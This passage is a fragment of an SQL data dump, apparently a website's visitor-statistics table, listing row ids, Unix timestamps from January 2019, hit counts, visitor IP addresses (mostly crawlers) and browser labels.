(378355,1548556468,11,11,0,0,'216.244.66.241','other'),(378356,1548556511,1,1,0,0,'54.36.148.209','other'),(378357,1548557010,1,1,0,0,'54.36.149.10','other'),(378358,1548557219,1,1,0,0,'54.36.149.80','other'),(378359,1548557390,3,3,0,0,'216.244.66.241','other'),(378360,1548557488,1,1,0,0,'66.249.69.74','chrome'),(378361,1548557587,1,1,0,0,'8.29.198.25','other'),(378362,1548557687,1,1,0,0,'207.46.13.88','other'),(378363,1548558119,1,1,0,0,'207.46.13.214','other'),(378364,1548558231,1,1,0,0,'31.173.81.69','chrome'),(378365,1548559107,1,1,0,0,'46.229.168.138','other'),(378366,1548559188,1,1,0,0,'54.36.148.119','other'),(378367,1548559470,5,5,0,0,'216.244.66.241','other'),(378368,1548559481,1,1,0,0,'207.46.13.88','other'),(378369,1548559529,1,1,0,0,'54.36.149.83','other'),(378370,1548559647,1,1,0,0,'54.36.149.77','other'),(378371,1548559670,1,1,0,0,'66.249.69.74','chrome'),(378372,1548559885,2,2,0,0,'66.249.69.122','chrome'),(378373,1548560037,1,1,0,0,'207.46.13.81','other'),(378374,1548560127,1,1,0,0,'46.229.168.138','other'),(378375,1548560205,1,1,0,0,'66.249.69.126','chrome'),(378376,1548560207,1,1,0,0,'54.36.148.114','other'),(378377,1548560256,2,2,0,0,'66.249.69.124','chrome'),(378378,1548560366,2,2,0,0,'5.45.207.19','other'),(378379,1548560391,4,4,0,0,'216.244.66.241','other'),(378380,1548560416,2,2,0,0,'141.8.142.103','other'),(378381,1548560501,1,1,0,0,'5.45.207.79','other'),(378382,1548560559,1,1,0,0,'54.36.148.84','other'),(378383,1548560566,1,1,0,0,'54.36.149.34','other'),(378384,1548560626,1,1,0,0,'178.154.244.11','other'),(378385,1548560889,1,1,0,0,'54.36.148.22','other'),(378386,1548561308,1,1,0,0,'207.46.13.199','other'),(378387,1548561399,1,1,0,0,'66.249.69.74','chrome'),(378388,1548561842,1,1,0,0,'54.36.148.147','other'),(378389,1548561913,1,1,0,0,'54.36.148.224','other'),(378390,1548561928,1,1,0,0,'54.36.148.242','other'),(378391,1548561936,1,1,0,0,'46.229.168.153','other'),(378392,1548562006,8,8,0,0,'216.244.66.241','other'),(378393,1548562089,1,1,0,0,'5.45.207.79','other'),(378394,1548562186,1,1,0,0,'46.229.168.130','other'),(378395,1548563382,1,1,0,0,'54.36.148.20','other'),(378396,1548563673,2,2,0,0,'216.244.66.241','other'),(378397,1548563786,1,1,0,0,'54.36.148.36','other'),(378398,1548563835,1,1,0,0,'207.46.13.88','other'),(378399,1548564005,1,1,0,0,'54.36.148.177','other'),(378400,1548564070,1,1,0,0,'54.36.149.64','other'),(378401,1548564305,1,1,0,0,'46.229.168.141','other'),(378402,1548564360,1,1,0,0,'54.36.148.243','other'),(378403,1548564400,1,1,0,0,'54.36.148.87','other'),(378404,1548564421,1,1,0,0,'46.229.168.153','other'),(378405,1548564710,1,1,0,0,'66.249.69.122','chrome'),(378406,1548564767,14,14,0,0,'216.244.66.241','other'),(378407,1548564981,1,1,0,0,'66.249.69.124','chrome'),(378408,1548565217,3,3,0,0,'66.249.69.126','chrome'),(378409,1548565706,2,2,0,0,'216.244.66.241','other'),(378410,1548565772,1,1,0,0,'54.36.148.106','other'),(378411,1548565857,1,1,0,0,'54.36.148.96','other'),(378412,1548565905,3,3,0,0,'66.249.69.124','chrome'),(378413,1548566230,1,1,0,0,'8.29.198.27','other'),(378414,1548566753,1,1,0,0,'66.249.69.126','chrome'),(378415,1548567134,2,2,0,0,'35.164.209.4','chrome'),(378416,1548567211,1,1,0,0,'54.36.148.24','other'),(378417,1548567296,1,1,0,0,'54.36.148.157','other'),(378418,1548567707,15,15,0,0,'216.244.66.241','other'),(378419,1548568418,1,1,0,0,'8.29.198.25','other'),(378420,1548568939,1,1,0,0,'207.46.13.214','other'),(378421,1548568945,1,1,0,0,'216.244.66.241','other'),(378422,1548569078,1,1,0,0,'207.46.13.81','other'),(378423,1548569885,1,1,0,0,'95.163.255.114','other'),(378424,1548570030,1,1,0,0,'207.46.13.30','other'),(378425,1548570314,20,20,0,0,'216.244.66.241','other'),(378426,1548570632,1,1,0,0,'54.36.148.149','other'),(378427,1548570788,1,1,0,0,'54.36.149.30','other'),(378428,1548571022,1,1,0,0,'46.229.168.129','other'),(378429,1548571051,1,1,0,0,'46.229.168.138','other'),(378430,1548571365,1,1,0,0,'216.244.66.241','other'),(378431,1548572215,1,1,0,0,'40.77.167.55','other'),(378432,1548573089,12,12,0,0,'216.244.66.241','other'),(378433,1548573839,15,15,0,0,'136.243.151.90','other'),(378434,1548573890,1,1,0,0,'207.46.13.81','other'),(378435,1548573994,2,2,0,0,'216.244.66.241','other'),(378436,1548574046,1,1,0,0,'180.76.15.156','other'),(378437,1548574165,1,1,0,0,'46.229.168.140','other'),(378438,1548574395,1,1,0,0,'207.46.13.30','other'),(378439,1548574431,1,1,0,0,'46.229.168.150','other'),(378440,1548574652,1,1,0,0,'54.36.148.160','other'),(378441,1548574742,13,13,0,0,'136.243.151.90','other'),(378442,1548574910,1,1,0,0,'54.36.148.34','other'),(378443,1548575066,2,2,0,0,'216.244.66.241','other'),(378444,1548575085,1,1,0,0,'188.146.163.143','other'),(378445,1548575277,1,1,0,0,'54.36.148.28','other'),(378446,1548575632,1,1,0,0,'46.211.131.191','chrome'),(378447,1548575649,12,12,0,0,'136.243.151.90','other'),(378448,1548575998,6,6,0,0,'216.244.66.241','other'),(378449,1548576046,1,1,0,0,'180.76.15.140','other'),(378450,1548576277,1,1,0,0,'54.36.149.79','other'),(378451,1548576340,1,1,0,0,'54.36.148.71','other'),(378452,1548576461,1,1,0,0,'54.36.148.66','other'),(378453,1548576529,1,1,0,0,'91.201.247.228','firefox'),(378454,1548576579,10,10,0,0,'136.243.151.90','other'),(378455,1548576903,1,1,0,0,'54.36.148.188','other'),(378456,1548576928,4,4,0,0,'216.244.66.241','other'),(378457,1548577067,1,1,0,0,'8.29.198.25','other'),(378458,1548577310,1,1,0,0,'54.36.148.141','other'),(378459,1548577318,1,1,0,0,'54.36.148.64','other'),(378460,1548577498,1,1,0,0,'54.36.148.212','other'),(378461,1548577511,2,2,0,0,'136.243.151.90','other'),(378462,1548578091,1,1,0,0,'54.36.149.24','other'),(378463,1548578435,1,1,0,0,'54.36.149.90','other'),(378464,1548578522,1,1,0,0,'46.229.168.152','other'),(378465,1548578562,1,1,0,0,'46.229.168.134','other'),(378466,1548578641,1,1,0,0,'46.229.168.132','other'),(378467,1548578707,9,9,0,0,'216.244.66.241','other'),(378468,1548579227,1,1,0,0,'66.249.69.74','chrome'),(378469,1548579246,1,1,0,0,'8.29.198.26','other'),(378470,1548579743,1,1,0,0,'54.36.148.61','other'),(378471,1548579782,2,2,0,0,'216.244.66.241','other'),(378472,1548580200,1,1,0,0,'91.196.178.49','chrome'),(378473,1548581494,11,11,0,0,'216.244.66.241','other'),(378474,1548581818,1,1,0,0,'91.196.178.66','chrome'),(378475,1548581929,1,1,0,0,'66.249.69.122','chrome'),(378476,1548581953,1,1,0,0,'46.229.168.138','other'),(378477,1548581957,1,1,0,0,'54.36.148.138','other'),(378478,1548582181,1,1,0,0,'54.36.149.53','other'),(378479,1548582499,2,2,0,0,'216.244.66.241','other'),(378480,1548582701,1,1,0,0,'40.77.167.34','other'),(378481,1548583740,1,1,0,0,'54.36.148.136','other'),(378482,1548584308,9,9,0,0,'216.244.66.241','other'),(378483,1548584697,1,1,0,0,'66.249.69.124','chrome'),(378484,1548584813,1,1,0,0,'46.229.168.139','other'),(378485,1548584930,1,1,0,0,'54.36.148.135','other'),(378486,1548585404,4,4,0,0,'216.244.66.241','other'),(378487,1548585739,1,1,0,0,'54.36.149.37','other'),(378488,1548586333,2,2,0,0,'46.229.168.146','other'),(378489,1548586541,1,1,0,0,'180.76.15.29','other'),(378490,1548586674,1,1,0,0,'54.36.148.80','other'),(378491,1548587314,3,3,0,0,'216.244.66.241','other'),(378492,1548587514,1,1,0,0,'54.36.149.29','other'),(378493,1548587920,1,1,0,0,'8.29.198.26','other'),(378494,1548588075,1,1,0,0,'54.36.148.109','other'),(378495,1548588224,3,3,0,0,'216.244.66.241','other'),(378496,1548588540,1,1,0,0,'180.76.15.6','other'),(378497,1548588641,1,1,0,0,'54.36.149.52','other'),(378498,1548589508,1,1,0,0,'54.36.148.57','other'),(378499,1548589790,2,2,0,0,'157.55.39.83','other'),(378500,1548589906,7,7,0,0,'216.244.66.241','other'),(378501,1548590027,1,1,0,0,'66.249.69.72','chrome'),(378502,1548590078,1,1,0,0,'8.29.198.27','other'),(378503,1548590260,1,1,0,0,'46.229.168.153','other'),(378504,1548590797,1,1,0,0,'54.36.148.61','other'),(378505,1548590925,1,1,0,0,'51.255.65.46','other'),(378506,1548591128,2,2,0,0,'173.244.209.229','firefox'),(378507,1548591211,5,5,0,0,'216.244.66.241','other'),(378508,1548591268,1,1,0,0,'54.36.148.164','other'),(378509,1548591463,1,1,0,0,'54.36.149.22','other'),(378510,1548591511,2,2,0,0,'66.249.69.124','chrome'),(378511,1548591898,1,1,0,0,'40.77.167.169','other'),(378512,1548592148,1,1,0,0,'54.36.148.21','other'),(378513,1548592397,1,1,0,0,'54.36.148.232','other'),(378514,1548592703,5,5,0,0,'216.244.66.241','other'),(378515,1548592885,1,1,0,0,'54.36.149.88','other'),(378516,1548593219,1,1,0,0,'46.201.113.160','chrome'),(378517,1548593654,1,1,0,0,'54.36.148.15','other'),(378518,1548593834,1,1,0,0,'54.36.148.142','other'),(378519,1548593867,7,7,0,0,'216.244.66.241','other'),(378520,1548593937,1,1,0,0,'54.36.148.241','other'),(378521,1548593987,1,1,0,0,'54.36.149.32','other'),(378522,1548594662,1,1,0,0,'54.36.148.18','other'),(378523,1548594822,1,1,0,0,'157.55.39.83','other'),(378524,1548595516,2,2,0,0,'216.244.66.241','other'),(378525,1548595761,1,1,0,0,'66.249.69.122','chrome'),(378526,1548596336,1,1,0,0,'66.249.69.72','chrome'),(378527,1548596687,7,7,0,0,'216.244.66.241','other'),(378528,1548596788,1,1,0,0,'157.55.39.171','other'),(378529,1548597586,1,1,0,0,'66.249.69.122','chrome'),(378530,1548597700,1,1,0,0,'46.229.168.140','other'),(378531,1548598284,10,10,0,0,'216.244.66.241','other'),(378532,1548598325,1,1,0,0,'40.77.167.174','other'),(378533,1548598412,1,1,0,0,'46.229.168.154','other'),(378534,1548598485,1,1,0,0,'207.46.13.205','other'),(378535,1548598597,1,1,0,0,'46.229.168.136','other'),(378536,1548598698,1,1,0,0,'46.229.168.130','other'),(378537,1548598755,1,1,0,0,'8.29.198.26','other'),(378538,1548599044,4,4,0,0,'66.249.69.122','chrome'),(378539,1548599153,1,1,0,0,'66.249.69.124','chrome'),(378540,1548599324,1,1,0,0,'54.36.148.174','other'),(378541,1548599540,6,6,0,0,'216.244.66.241','other'),(378542,1548600339,1,1,0,0,'180.76.15.143','other'),(378543,1548600400,1,1,0,0,'91.196.178.103','chrome'),(378544,1548600549,1,1,0,0,'46.229.168.135','other'),(378545,1548600661,1,1,0,0,'54.36.148.254','other'),(378546,1548600900,1,1,0,0,'8.29.198.27','other'),(378547,1548601017,5,5,0,0,'216.244.66.241','other'),(378548,1548602049,5,5,0,0,'216.244.66.241','other'),(378549,1548602990,1,1,0,0,'23.101.169.3','msie'),(378550,1548603016,1,1,0,0,'46.211.96.44','chrome'),(378551,1548603087,5,5,0,0,'216.244.66.241','other'),(378552,1548603685,1,1,0,0,'54.36.148.160','other'),(378553,1548603983,2,2,0,0,'40.77.167.31','other'),(378554,1548603987,1,1,0,0,'46.229.168.153','other'),(378555,1548604009,5,5,0,0,'216.244.66.241','other'),(378556,1548604021,1,1,0,0,'54.36.149.29','other'),(378557,1548604386,1,1,0,0,'54.36.149.19','other'),(378558,1548604415,1,1,0,0,'54.36.148.218','other'),(378559,1548604580,1,1,0,0,'54.36.149.18','other'),(378560,1548604876,1,1,0,0,'91.196.178.99','chrome'),(378561,1548604967,7,7,0,0,'216.244.66.241','other'),(378562,1548604987,1,1,0,0,'54.36.148.160','other'),(378563,1548605384,1,1,0,0,'54.36.148.214','other'),(378564,1548605476,1,1,0,0,'46.211.96.44','chrome'),(378565,1548605580,1,1,0,0,'54.36.148.234','other'),(378566,1548605681,1,1,0,0,'23.101.169.3','msie'),(378567,1548606298,1,1,0,0,'54.36.149.102','other'),(378568,1548606425,1,1,0,0,'46.229.168.132','other'),(378569,1548606735,4,4,0,0,'216.244.66.241','other'),(378570,1548607455,1,1,0,0,'54.36.149.26','other'),(378571,1548607769,4,4,0,0,'216.244.66.241','other'),(378572,1548608346,1,1,0,0,'54.36.148.150','other'),(378573,1548608559,1,1,0,0,'40.77.167.31','other'),(378574,1548608607,1,1,0,0,'46.229.168.154','other'),(378575,1548609143,108,108,0,0,'144.76.81.229','other'),(378576,1548609230,1,1,0,0,'46.229.168.146','other'),(378577,1548609256,3,3,0,0,'216.244.66.241','other'),(378578,1548609541,1,1,0,0,'66.249.69.126','chrome'),(378579,1548609602,1,1,0,0,'8.29.198.26','other'),(378580,1548609642,1,1,0,0,'46.229.168.135','other'),(378581,1548609748,1,1,0,0,'54.36.149.53','other'),(378582,1548609900,1,1,0,0,'13.66.139.0','other'),(378583,1548610264,5,5,0,0,'216.244.66.241','other'),(378584,1548610417,1,1,0,0,'207.46.13.205','other'),(378585,1548611229,6,6,0,0,'216.244.66.241','other'),(378586,1548611447,1,1,0,0,'54.36.148.130','other'),(378587,1548611612,1,1,0,0,'194.71.109.44','chrome'),(378588,1548611729,1,1,0,0,'8.29.198.26','other'),(378589,1548611951,1,1,0,0,'23.101.169.3','msie'),(378590,1548612146,17,17,0,0,'216.244.66.241','other'),(378591,1548612914,1,1,0,0,'66.249.69.72','chrome'),(378592,1548613190,2,2,0,0,'207.46.13.168','other'),(378593,1548613501,2,2,0,0,'216.244.66.241','other'),(378594,1548613795,1,1,0,0,'13.66.139.0','other'),(378595,1548613961,1,1,0,0,'46.229.168.133','other'),(378596,1548614371,1,1,0,0,'54.36.148.89','other'),(378597,1548614433,1,1,0,0,'207.46.13.168','other'),(378598,1548614458,2,2,0,0,'91.196.178.132','chrome'),(378599,1548614678,1,1,0,0,'23.101.169.3','msie'),(378600,1548614749,4,4,0,0,'216.244.66.241','other'),(378601,1548615139,1,1,0,0,'37.73.74.141','chrome'),(378602,1548615152,1,1,0,0,'46.229.168.146','other'),(378603,1548615225,1,1,0,0,'54.36.148.231','other'),(378604,1548615357,1,1,0,0,'46.229.168.133','other'),(378605,1548615752,3,3,0,0,'216.244.66.241','other'),(378606,1548615971,1,1,0,0,'54.36.148.188','other'),(378607,1548616075,1,1,0,0,'54.36.148.200','other'),(378608,1548616418,1,1,0,0,'54.36.148.133','other'),(378609,1548616613,1,1,0,0,'46.229.168.145','other'),(378610,1548617214,1,1,0,0,'54.36.149.8','other'),(378611,1548617465,13,13,0,0,'216.244.66.241','other'),(378612,1548617648,1,1,0,0,'54.36.149.56','other'),(378613,1548617851,1,1,0,0,'46.229.168.150','other'),(378614,1548618124,1,1,0,0,'46.229.168.147','other'),(378615,1548618342,1,1,0,0,'54.36.149.11','other'),(378616,1548618354,1,1,0,0,'40.77.167.145','other'),(378617,1548618400,3,3,0,0,'216.244.66.241','other'),(378618,1548618438,1,1,0,0,'54.36.149.9','other'),(378619,1548619452,3,3,0,0,'216.244.66.241','other'),(378620,1548619646,1,1,0,0,'46.229.168.141','other'),(378621,1548620442,13,13,0,0,'216.244.66.241','other'),(378622,1548620443,1,1,0,0,'8.29.198.27','other'),(378623,1548621814,1,1,0,0,'66.249.69.126','chrome'),(378624,1548622549,1,1,0,0,'8.29.198.25','other'),(378625,1548622812,1,1,0,0,'46.229.168.136','other'),(378626,1548623074,10,10,0,0,'216.244.66.241','other'),(378627,1548623219,1,1,0,0,'46.229.168.153','other'),(378628,1548623416,1,1,0,0,'54.36.149.75','other'),(378629,1548623540,1,1,0,0,'54.36.148.119','other'),(378630,1548624268,2,2,0,0,'216.244.66.241','other'),(378631,1548624406,1,1,0,0,'54.36.148.142','other'),(378632,1548624754,1,1,0,0,'46.229.168.141','other'),(378633,1548625049,1,1,0,0,'46.229.168.152','other'),(378634,1548625054,1,1,0,0,'54.36.148.169','other'),(378635,1548625163,1,1,0,0,'54.36.148.209','other'),(378636,1548625245,1,1,0,0,'54.36.149.77','other'),(378637,1548625263,1,1,0,0,'54.36.148.138','other'),(378638,1548625663,1,1,0,0,'54.36.148.100','other'),(378639,1548625753,5,5,0,0,'216.244.66.241','other'),(378640,1548625755,1,1,0,0,'54.36.148.255','other'),(378641,1548626381,2,2,0,0,'207.46.13.205','other'),(378642,1548626645,1,1,0,0,'46.229.168.130','other'),(378643,1548626657,1,1,0,0,'54.36.149.11','other'),(378644,1548626715,1,1,0,0,'66.249.69.122','chrome'),(378645,1548626770,2,2,0,0,'216.244.66.241','other'),(378646,1548627618,1,1,0,0,'54.36.149.81','other'),(378647,1548627706,1,1,0,0,'54.36.149.23','other'),(378648,1548628092,1,1,0,0,'46.229.168.143','other'),(378649,1548628149,1,1,0,0,'54.36.148.104','other'),(378650,1548628210,1,1,0,0,'54.36.148.188','other'),(378651,1548628228,1,1,0,0,'46.229.168.129','other'),(378652,1548628229,1,1,0,0,'54.36.148.107','other'),(378653,1548628369,1,1,0,0,'54.36.148.106','other'),(378654,1548628410,9,9,0,0,'216.244.66.241','other'),(378655,1548628469,1,1,0,0,'54.36.149.86','other'),(378656,1548628909,1,1,0,0,'157.55.39.188','other'),(378657,1548629262,1,1,0,0,'46.229.168.133','other'),(378658,1548629333,2,2,0,0,'66.249.69.72','chrome'),(378659,1548629391,1,1,0,0,'216.244.66.241','other'),(378660,1548629443,2,2,0,0,'13.66.139.0','other'),(378661,1548629886,1,1,0,0,'207.46.13.229','other'),(378662,1548631058,1,1,0,0,'46.229.168.153','other'),(378663,1548631181,9,9,0,0,'216.244.66.241','other'),(378664,1548631286,1,1,0,0,'8.29.198.25','other'),(378665,1548631787,1,1,0,0,'54.36.148.161','other'),(378666,1548632096,8,8,0,0,'216.244.66.241','other'),(378667,1548632558,1,1,0,0,'54.36.148.176','other'),(378668,1548632629,1,1,0,0,'46.229.168.146','other'),(378669,1548632812,1,1,0,0,'54.36.148.186','other'),(378670,1548632852,1,1,0,0,'54.36.148.113','other'),(378671,1548633118,2,2,0,0,'216.244.66.241','other'),(378672,1548633373,1,1,0,0,'8.29.198.25','other'),(378673,1548633761,1,1,0,0,'46.229.168.145','other'),(378674,1548633805,1,1,0,0,'66.249.69.74','chrome'),(378675,1548634135,7,7,0,0,'216.244.66.241','other'),(378676,1548634369,1,1,0,0,'46.229.168.146','other'),(378677,1548634466,1,1,0,0,'54.36.149.81','other'),(378678,1548634529,1,1,0,0,'54.36.148.255','other'),(378679,1548634729,1,1,0,0,'66.249.69.122','chrome'),(378680,1548634787,1,1,0,0,'54.36.148.93','other'),(378681,1548635089,1,1,0,0,'54.36.149.39','other'),(378682,1548635106,6,6,0,0,'216.244.66.241','other'),(378683,1548635729,1,1,0,0,'54.36.148.55','other'),(378684,1548636002,1,1,0,0,'46.133.166.63','chrome'),(378685,1548636063,1,1,0,0,'54.36.148.11','other'),(378686,1548636143,1,1,0,0,'54.36.149.107','other'),(378687,1548636287,1,1,0,0,'46.229.168.135','other'),(378688,1548636435,1,1,0,0,'66.249.69.74','chrome'),(378689,1548636637,8,8,0,0,'216.244.66.241','other'),(378690,1548636667,1,1,0,0,'54.36.148.218','other'),(378691,1548637011,1,1,0,0,'66.249.65.198','chrome'),(378692,1548637060,1,1,0,0,'66.249.69.122','chrome'),(378693,1548637068,1,1,0,0,'54.36.149.100','other'),(378694,1548637070,1,1,0,0,'46.229.168.130','other'),(378695,1548637933,5,5,0,0,'216.244.66.241','other'),(378696,1548637959,1,1,0,0,'54.36.148.81','other'),(378697,1548638065,1,1,0,0,'54.36.148.117','other'),(378698,1548638122,1,1,0,0,'54.36.148.244','other'),(378699,1548639329,1,1,0,0,'54.36.148.209','other'),(378700,1548639338,11,11,0,0,'216.244.66.241','other'),(378701,1548639384,1,1,0,0,'46.229.168.151','other'),(378702,1548639539,1,1,0,0,'54.36.148.144','other'),(378703,1548639604,1,1,0,0,'54.36.148.78','other'),(378704,1548639718,1,1,0,0,'93.119.227.34','other'),(378705,1548639719,1,1,0,0,'93.119.227.34','chrome'),(378706,1548640281,1,1,0,0,'54.36.148.112','other'),(378707,1548640343,3,3,0,0,'216.244.66.241','other'),(378708,1548640579,1,1,0,0,'54.36.149.5','other'),(378709,1548640780,1,1,0,0,'46.229.168.136','other'),(378710,1548640982,1,1,0,0,'54.36.149.79','other'),(378711,1548641225,1,1,0,0,'54.36.148.49','other'),(378712,1548641409,2,2,0,0,'207.46.13.56','other'),(378713,1548641825,1,1,0,0,'180.76.15.149','other'),(378714,1548642008,1,1,0,0,'54.36.148.252','other'),(378715,1548642093,5,5,0,0,'216.244.66.241','other'),(378716,1548642117,1,1,0,0,'8.29.198.26','other'),(378717,1548642180,1,1,0,0,'54.36.149.84','other'),(378718,1548643002,8,8,0,0,'216.244.66.241','other'),(378719,1548643113,1,1,0,0,'54.36.149.41','other'),(378720,1548643733,1,1,0,0,'46.229.168.134','other'),(378721,1548643756,1,1,0,0,'54.36.148.151','other'),(378722,1548643919,1,1,0,0,'95.28.61.133','msie'),(378723,1548643966,1,1,0,0,'54.36.149.64','other'),(378724,1548644123,3,3,0,0,'216.244.66.241','other'),(378725,1548644199,1,1,0,0,'8.29.198.26','other'),(378726,1548644744,1,1,0,0,'46.229.168.152','other'),(378727,1548644892,1,1,0,0,'66.249.69.124','chrome'),(378728,1548645025,13,13,0,0,'216.244.66.241','other'),(378729,1548645342,1,1,0,0,'66.249.69.122','chrome'),(378730,1548645728,1,1,0,0,'54.36.149.105','other'),(378731,1548645997,1,1,0,0,'46.229.168.141','other'),(378732,1548646273,1,1,0,0,'54.36.149.28','other'),(378733,1548646623,1,1,0,0,'54.36.148.38','other'),(378734,1548646629,1,1,0,0,'54.36.149.12','other'),(378735,1548647533,1,1,0,0,'54.36.148.14','other'),(378736,1548647626,9,9,0,0,'216.244.66.241','other'),(378737,1548647883,1,1,0,0,'46.229.168.138','other'),(378738,1548648059,1,1,0,0,'54.36.149.3','other'),(378739,1548648261,1,1,0,0,'157.55.39.166','other'),(378740,1548648387,1,1,0,0,'54.36.148.69','other'),(378741,1548648441,1,1,0,0,'66.249.69.72','chrome'),(378742,1548648499,1,1,0,0,'54.36.148.91','other'),(378743,1548648538,1,1,0,0,'46.229.168.134','other'),(378744,1548648577,3,3,0,0,'216.244.66.241','other'),(378745,1548648611,1,1,0,0,'54.36.149.30','other'),(378746,1548648935,1,1,0,0,'207.46.13.191','other'),(378747,1548649069,1,1,0,0,'54.36.148.209','other'),(378748,1548649112,1,1,0,0,'54.36.148.67','other'),(378749,1548649519,1,1,0,0,'157.55.39.79','other'),(378750,1548649552,1,1,0,0,'216.244.66.241','other'),(378751,1548649626,1,1,0,0,'54.36.149.95','other'),(378752,1548650029,1,1,0,0,'54.36.148.199','other'),(378753,1548650592,5,5,0,0,'216.244.66.241','other'),(378754,1548650884,1,1,0,0,'54.36.148.147','other'),(378755,1548651547,6,6,0,0,'216.244.66.241','other'),(378756,1548651695,1,1,0,0,'54.36.148.246','other'),(378757,1548651737,1,1,0,0,'54.36.149.64','other'),(378758,1548652865,1,1,0,0,'54.36.148.39','other'),(378759,1548652866,2,2,0,0,'54.212.117.160','chrome'),(378760,1548652870,1,1,0,0,'54.36.148.28','other'),(378761,1548652949,1,1,0,0,'8.29.198.26','other'),(378762,1548653209,12,12,0,0,'216.244.66.241','other'),(378763,1548653233,1,1,0,0,'46.229.168.149','other'),(378764,1548653278,1,1,0,0,'157.55.39.166','other'),(378765,1548653680,1,1,0,0,'54.36.149.88','other'),(378766,1548654173,1,1,0,0,'46.229.168.154','other'),(378767,1548654941,1,1,0,0,'46.229.168.152','other'),(378768,1548655016,5,5,0,0,'216.244.66.241','other'),(378769,1548655024,1,1,0,0,'8.29.198.25','other'),(378770,1548655271,1,1,0,0,'46.229.168.136','other'),(378771,1548655309,1,1,0,0,'66.249.69.186','chrome'),(378772,1548655361,1,1,0,0,'46.229.168.151','other'),(378773,1548655417,1,1,0,0,'54.36.148.211','other'),(378774,1548655449,1,1,0,0,'54.36.149.96','other'),(378775,1548655499,1,1,0,0,'46.229.168.148','other'),(378776,1548655725,1,1,0,0,'54.36.148.198','other'),(378777,1548655940,5,5,0,0,'216.244.66.241','other'),(378778,1548655963,1,1,0,0,'109.70.100.18','other'),(378779,1548656216,1,1,0,0,'54.36.148.114','other'),(378780,1548656249,1,1,0,0,'157.55.39.79','other'),(378781,1548656382,1,1,0,0,'54.36.148.237','other'),(378782,1548656682,1,1,0,0,'207.46.13.191','other'),(378783,1548656913,3,3,0,0,'216.244.66.241','other'),(378784,1548656995,1,1,0,0,'66.249.69.190','chrome'),(378785,1548657120,1,1,0,0,'46.229.168.133','other'),(378786,1548657506,1,1,0,0,'54.36.148.140','other'),(378787,1548657928,1,1,0,0,'54.36.149.36','other'),(378788,1548657932,1,1,0,0,'54.36.148.153','other'),(378789,1548658063,1,1,0,0,'54.36.148.231','other'),(378790,1548658093,1,1,0,0,'207.46.13.42','other'),(378791,1548658276,1,1,0,0,'178.92.177.58','chrome'),(378792,1548658333,1,1,0,0,'46.229.168.149','other'),(378793,1548658358,1,1,0,0,'46.229.168.148','other'),(378794,1548658412,1,1,0,0,'54.36.149.1','other'),(378795,1548658562,1,1,0,0,'54.36.148.42','other'),(378796,1548658563,1,1,0,0,'66.249.69.186','chrome'),(378797,1548658593,1,1,0,0,'54.36.148.73','other'),(378798,1548658698,1,1,0,0,'54.36.148.117','other'),(378799,1548658711,7,7,0,0,'216.244.66.241','other'),(378800,1548658830,1,1,0,0,'66.249.69.188','chrome'),(378801,1548658986,1,1,0,0,'207.46.13.141','other'),(378802,1548659115,1,1,0,0,'54.36.148.139','other'),(378803,1548659118,1,1,0,0,'54.36.148.122','other'),(378804,1548659167,1,1,0,0,'66.249.69.74','chrome'),(378805,1548659314,1,1,0,0,'46.229.168.142','other'),(378806,1548659616,5,5,0,0,'216.244.66.241','other'),(378807,1548660242,1,1,0,0,'207.46.13.141','other'),(378808,1548660247,1,1,0,0,'54.36.149.101','other'),(378809,1548660706,1,1,0,0,'54.36.149.82','other'),(378810,1548660913,1,1,0,0,'66.249.69.122','chrome'),(378811,1548660983,1,1,0,0,'66.249.69.72','chrome'),(378812,1548661238,9,9,0,0,'216.244.66.241','other'),(378813,1548661886,1,1,0,0,'66.249.69.74','chrome'),(378814,1548661940,1,1,0,0,'46.229.168.139','other'),(378815,1548661942,1,1,0,0,'176.101.217.148','chrome'),(378816,1548662037,1,1,0,0,'54.36.148.75','other'),(378817,1548662049,1,1,0,0,'207.46.13.38','other'),(378818,1548662151,1,1,0,0,'5.45.207.79','other'),(378819,1548662190,2,2,0,0,'216.244.66.241','other'),(378820,1548662196,1,1,0,0,'157.55.39.79','other'),(378821,1548662337,1,1,0,0,'46.229.168.138','other'),(378822,1548662410,1,1,0,0,'95.132.7.190','firefox'),(378823,1548662423,1,1,0,0,'54.36.149.54','other'),(378824,1548662638,1,1,0,0,'54.36.148.31','other'),(378825,1548662713,1,1,0,0,'31.184.238.56','chrome'),(378826,1548662759,1,1,0,0,'66.249.69.122','chrome'),(378827,1548662783,1,1,0,0,'5.35.27.94','chrome'),(378828,1548663096,1,1,0,0,'216.244.66.241','other'),(378829,1548663202,2,2,0,0,'46.229.168.151','other'),(378830,1548663245,1,1,0,0,'54.36.149.14','other'),(378831,1548663377,1,1,0,0,'54.36.148.240','other'),(378832,1548663378,1,1,0,0,'213.111.192.196','chrome'),(378833,1548663562,1,1,0,0,'54.36.148.133','other'),(378834,1548663682,1,1,0,0,'54.36.148.253','other'),(378835,1548663780,1,1,0,0,'8.29.198.26','other'),(378836,1548663959,1,1,0,0,'157.55.39.79','other'),(378837,1548664172,7,7,0,0,'216.244.66.241','other'),(378838,1548664297,1,1,0,0,'54.36.149.55','other'),(378839,1548664506,1,1,0,0,'91.196.178.66','chrome'),(378840,1548664981,1,1,0,0,'46.229.168.148','other'),(378841,1548665064,1,1,0,0,'46.229.168.138','other'),(378842,1548665502,1,1,0,0,'37.52.20.210','chrome'),(378843,1548665513,1,1,0,0,'54.36.148.36','other'),(378844,1548665555,1,1,0,0,'54.36.149.33','other'),(378845,1548665688,1,1,0,0,'54.36.148.216','other'),(378846,1548665852,1,1,0,0,'8.29.198.26','other'),(378847,1548665884,1,1,0,0,'54.36.148.187','other'),(378848,1548666111,1,1,0,0,'95.134.206.11','chrome'),(378849,1548666171,1,1,0,0,'54.36.148.223','other'),(378850,1548666517,2,2,0,0,'195.10.210.70','chrome'),(378851,1548666714,5,5,0,0,'216.244.66.241','other'),(378852,1548667165,1,1,0,0,'91.196.178.163','chrome'),(378853,1548667478,1,1,0,0,'66.249.69.74','chrome'),(378854,1548667543,1,1,0,0,'46.229.168.139','other'),(378855,1548667635,6,6,0,0,'216.244.66.241','other'),(378856,1548667743,1,1,0,0,'54.36.148.195','other'),(378857,1548667754,1,1,0,0,'91.196.178.79','firefox'),(378858,1548667799,1,1,0,0,'178.92.14.99','chrome'),(378859,1548668119,2,2,0,0,'54.36.149.71','other'),(378860,1548668158,1,1,0,0,'176.101.217.148','chrome'),(378861,1548668203,1,1,0,0,'77.111.247.110','chrome'),(378862,1548668434,1,1,0,0,'5.45.207.19','other'),(378863,1548668651,1,1,0,0,'54.36.148.68','other'),(378864,1548668928,1,1,0,0,'46.229.168.152','other'),(378865,1548669366,1,1,0,0,'54.36.148.52','other'),(378866,1548669442,13,13,0,0,'216.244.